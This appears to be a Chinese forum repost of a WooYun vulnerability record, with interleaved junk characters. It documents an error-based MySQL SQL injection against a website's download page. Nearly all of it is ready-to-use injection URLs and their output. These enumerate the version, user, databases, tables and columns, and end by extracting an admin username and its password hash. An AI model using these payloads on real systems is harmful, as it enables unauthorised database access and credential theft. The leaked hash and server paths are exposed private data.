http://www.wooyun.org/bugs/wooyun-2010-01666
% z9 U9 m) i0 U/ K! F5 t0 F' {: t; {9 d; Q1 e9 K
之前想找个测试 没想到这有 可以测试下做个记录而已 , i6 \! k \# ~9 }- U- C. d
% _ F( s! e- R3 H9 R4 ~http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
0 M6 j6 k7 c& J3 D" \! j8 j. g; a* _- |+ `0 ?8 b8 a0 \# k+ @3 m/ x
/data0/htdocs/leqi_new/app/myapp.php( s) ?' A: W9 G/ h/ U G
* w& B0 N% D0 s( ?; _. S O5 } 或者
3 g J' k8 d a% ]: A& `+ Z2 n$ R3 C2 J E
/**********version()**********/ 5.1.49-log) s7 y' ~) h8 y+ X7 e8 X1 [4 `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' Z( ^! o: Z# O; I/ P2 D! M9 Q: S' A; ^& q9 _) P
/**********user()**********/
7 K1 d8 n% j) O X9 q J0 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
u: G7 ]& K5 } U9 Q! S4 \: R# E/ P+ B/ p0 S. D1 I
/**********database()**********/ leqi
% P3 c# I% {% u# d! z8 g3 z1 F2 thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ y* z# ]' j7 a0 q+ E1 h% P7 \
/ B1 V# m9 j6 _4 e/**********limit依次递归爆库**********/0 W& h T- i+ T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 l; ~2 [9 d1 n( d7 hinformation_schema
8 m% D( _8 e$ P7 Y% H6 I( m% X4 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( U, t) l" e7 M) w& h! S r) N d3 P
leqi% K, u0 E3 o x# r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 ?/ V" j; T' v/ A" ?/ x8 v, M7 } Y
test
5 O' a1 N# C9 ]5 A1 R% k. J
/ X+ O5 ^, q3 O7 y. a/**********limit依次递归爆表名**********/
# k# F2 k4 _- r, R. K$ k, Yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 a7 |; }7 N# I7 d6 q
users
: f* U; ~* F$ w8 y3 T& J% d9 j0 w6 F4 I1 X. _
/**********limit依次递归爆字段名**********/
; A$ ]8 ^% a& b' a2 ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: g/ a. [( z7 F. ~. ?. z. y7 V; Wuser_id,username,nickname,passwd,group_id
4 R# R: c, _8 R& ]8 o+ Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" X- E; j O. \1 G
/wapc/5000_0005_0039 u+ w2 o8 q- C' U4 k
11 210 r' Q+ S) ]0 A* t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23* m/ |0 U/ W7 Z/ x: C3 A2 q! @
/wapc/5000_0005_0039 J) u8 d! c' r/ Q& d: ^+ ?2 _
11 341 351 361' V v0 A0 A$ u0 V r
/**********爆数据**********/
* L+ |- e# V0 ^& f. Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
: z" v4 R# b7 U5 ]5 {9 kadmin
( c$ ~- R* ]$ ^. C. c! t5 D% n$ S* Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! ~$ F% s/ s! N
6a8b4574ca231eb8bd52764d4978ffcd. x8 `( G) y( @+ T) G# I# O7 V
7 ]- l0 M b' M6 p$ H ( W- P2 q p7 Z
|